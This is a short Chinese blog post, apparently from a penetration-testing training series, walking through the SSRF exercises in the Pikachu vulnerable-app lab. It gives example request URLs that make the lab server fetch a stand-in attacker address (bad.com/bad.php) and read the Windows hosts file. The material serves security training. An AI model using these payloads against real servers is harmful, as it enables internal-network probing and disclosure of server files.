发表更新penetration Test / train2 分钟读完 (大约236个字)

something about Pikachu - SSRF

pikachu

pikachu => 备份地址

SSRF

概述

SSRF(Server-Side Request Forgery:服务器端请求伪造)。主要由于服务端提供了从其他服务器应用获取数据 的功能,但又未对目标地址做严格的限制,导致攻击者可以传入恶意地址。服务器对恶意地址进行请求, 返回恶意内容后造成损失。

PHP后台对目标地址请求的函数主要有:

  • file_get_contents()

  • fsockopen()

  • curl_exec()

SSRF(curl)

在url中拼接对应的恶意地址即可。

1
http://train.com/pikachu/vul/ssrf/ssrf_curl.php?url=http://bad.com/

SSRF(file_get_content)

在url中拼接对应的恶意地址即可。

1
http://train.com/pikachu/vul/ssrf/ssrf_fgc.php?file=http://bad.com/bad.php

也可指定目标服务器上指定文件。

1
http://train.com/pikachu/vul/ssrf/ssrf_fgc.php?file=C:\Windows\System32\drivers\etc\hosts
 

归档

×